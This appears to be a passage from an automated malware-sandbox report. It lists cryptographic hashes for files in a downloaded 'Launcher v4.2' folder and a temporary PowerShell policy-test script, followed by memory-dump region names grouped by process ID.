C:\Users\Admin\Downloads\Launcher v4.2\lib\jphp-core.jar
| MD5 | 7e5e3d6d352025bd7f093c2d7f9b21ab |
| SHA1 | ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57 |
| SHA256 | 5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a |
| SHA512 | c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad |
C:\Users\Admin\Downloads\Launcher v4.2\lib\jna.jar
| MD5 | 34d3537524a6c8c134e840e7be601569 |
| SHA1 | cb208278274bf12ebdb56c61bd7407e6f774d65a |
| SHA256 | c4dadeeecaa90c8847902082aee5eb107fcf59c5d0e63a17fcaf273c0e2d2bd1 |
| SHA512 | d38d124f5d2c227da57b0473bb37709a4d9f6fbcf5b6da3a6e15e2a90e5c2980d9dc649cdaeecb08b376dead73267128c1972d9e25ecc243424b8f6e6f4e67b3 |
memory/1744-1312-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/1744-1336-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/1744-1348-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/1744-1354-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/1744-1358-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/1744-1383-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/1744-1384-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/3884-1387-0x0000000000DF0000-0x0000000000E26000-memory.dmp
memory/3060-1388-0x0000000005190000-0x00000000057B8000-memory.dmp
memory/3884-1390-0x0000000004AF0000-0x0000000004B12000-memory.dmp
memory/3884-1392-0x0000000004E30000-0x0000000004E96000-memory.dmp
memory/3884-1391-0x0000000004C90000-0x0000000004CF6000-memory.dmp
memory/3516-1394-0x0000000006070000-0x00000000063C4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zb3kx3fy.r4l.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3516-1431-0x0000000006680000-0x00000000066CC000-memory.dmp
memory/3516-1430-0x0000000006650000-0x000000000666E000-memory.dmp
memory/3884-1433-0x0000000006010000-0x000000000602A000-memory.dmp
memory/3884-1432-0x0000000006B60000-0x0000000006BF6000-memory.dmp
memory/3884-1434-0x0000000006060000-0x0000000006082000-memory.dmp
memory/3884-1435-0x00000000071B0000-0x0000000007754000-memory.dmp
memory/4188-1459-0x0000000006320000-0x0000000006674000-memory.dmp
memory/1576-1486-0x000000006DEE0000-0x000000006DF2C000-memory.dmp
memory/4188-1481-0x000000006DEE0000-0x000000006DF2C000-memory.dmp
memory/4188-1492-0x0000000006D30000-0x0000000006D4E000-memory.dmp
memory/4188-1480-0x0000000006D50000-0x0000000006D82000-memory.dmp
memory/4188-1501-0x0000000007A60000-0x0000000007B03000-memory.dmp
memory/3436-1502-0x000000006DEE0000-0x000000006DF2C000-memory.dmp
memory/3800-1513-0x000000006DEE0000-0x000000006DF2C000-memory.dmp
memory/1576-1523-0x0000000007400000-0x0000000007A7A000-memory.dmp
memory/1576-1524-0x0000000006E40000-0x0000000006E4A000-memory.dmp
memory/4188-1525-0x0000000007DB0000-0x0000000007DC1000-memory.dmp
memory/3800-1526-0x0000000007C20000-0x0000000007C2E000-memory.dmp
memory/1576-1527-0x0000000007010000-0x0000000007024000-memory.dmp
memory/1576-1528-0x0000000007100000-0x000000000711A000-memory.dmp
memory/1576-1529-0x00000000070E0000-0x00000000070E8000-memory.dmp
memory/1744-1544-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/1744-1552-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/1744-1560-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/3548-1561-0x0000000005690000-0x00000000059E4000-memory.dmp
memory/3548-1571-0x0000000005D80000-0x0000000005DCC000-memory.dmp
memory/1444-1573-0x00000000061A0000-0x00000000064F4000-memory.dmp
memory/1444-1583-0x0000000006EF0000-0x0000000006F3C000-memory.dmp
memory/1100-1585-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1100-1586-0x0000000005B00000-0x0000000006118000-memory.dmp
memory/1100-1587-0x0000000005590000-0x00000000055A2000-memory.dmp
memory/1100-1588-0x00000000056C0000-0x00000000057CA000-memory.dmp
memory/1100-1589-0x0000000005A50000-0x0000000005A8C000-memory.dmp
memory/1100-1590-0x0000000005A90000-0x0000000005ADC000-memory.dmp
memory/1100-1591-0x0000000006700000-0x00000000068C2000-memory.dmp
memory/1100-1592-0x0000000006E00000-0x000000000732C000-memory.dmp
memory/1100-1593-0x0000000006AA0000-0x0000000006B32000-memory.dmp
memory/1100-1594-0x00000000068D0000-0x0000000006920000-memory.dmp
memory/1100-1595-0x00000000069A0000-0x0000000006A16000-memory.dmp
memory/1100-1596-0x0000000006950000-0x000000000696E000-memory.dmp
memory/1792-1599-0x0000000006380000-0x00000000063CC000-memory.dmp